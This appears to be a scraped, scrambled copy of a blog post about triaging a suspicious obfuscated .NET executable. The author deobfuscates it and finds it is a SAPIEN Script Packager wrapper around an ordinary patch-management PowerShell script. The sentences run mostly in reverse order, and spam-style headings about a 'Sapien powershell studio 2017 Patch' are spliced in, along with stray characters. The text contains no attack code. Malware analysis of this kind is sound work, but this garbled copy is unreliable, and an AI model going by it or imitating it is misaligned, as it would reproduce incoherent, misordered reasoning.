I quickly realized that analyzed binary was likely generated using SAPIEN Script Packager - available in products like PowerShell Studio or PrimalScript. I took a bunch of unique strings from the analyzed binary and fired up my favorite search engine.
Was it a custom made packer? Or maybe the file was generated by some tool that I was not aware of? One last thing I wanted to figure out was the reason why someone made an effort to package a simple PowerShell script in this way. All that effort for nothing? What a disappointment!
#Sapien powershell studio 2017 Patch#
Instead, I was looking at a rather ordinary script written by someone to manage software and patch installation on the workstations.
#Sapien powershell studio 2017 code#
It was still a PowerShell code but it did not look like Invoke-Mimikatz or other offensive module that I knew of. The code worked well but what I got back was not exactly what I expected. I also needed to make a few small adjustments to the original code to read the content of the resource from a file and pass it to decryption function. Then I copied C# code responsible for decryption from dnSpy window and pasted it to LINQPad. Using CFF Explorer I exported RT_RCDATA resource content to a file. I was aware of the tools like p0wnedShell making use of exactly same method to “ execute PowerShell code without running powershell.exe” so I thought that I am finally onto something.Īt this stage, I just wanted to get my hands on a decrypted PowerShell code as fast as possible.
I quickly located main part of the program and realized that I am likely dealing with some kind of loader – part of the code was responsible for reading, decrypting and parsing data from two RT_RCDATA resources.Īfter poking around a little bit more I found a method that was responsible for creating a new PowerShell runspace and executing PowerShell code retrieved from a previously decrypted resource. Fortunately, de4dot did all the dirty work for me and within seconds I was left with a compact code consisting of several classes. I opened the file in dnSpy and immediately encountered first obstacle - code was obfuscated with SmartAssembly. Oh boy, how little did I know… (Re)discovery
Well, I thought, even if the file turns out to be non-malicious, there must be a reason for it to be obfuscated. At the same time the file was obfuscated (based on a quick look at FLOSS output) and according to VirusTotal it was detected as “potentially malicious” by several antivirus products. NET binary located in a seemingly legitimate subdirectory under Program Files. Several weeks ago, during one of the investigations, I needed to triage a few potentially malicious Windows executables.
0 kommentar(er)
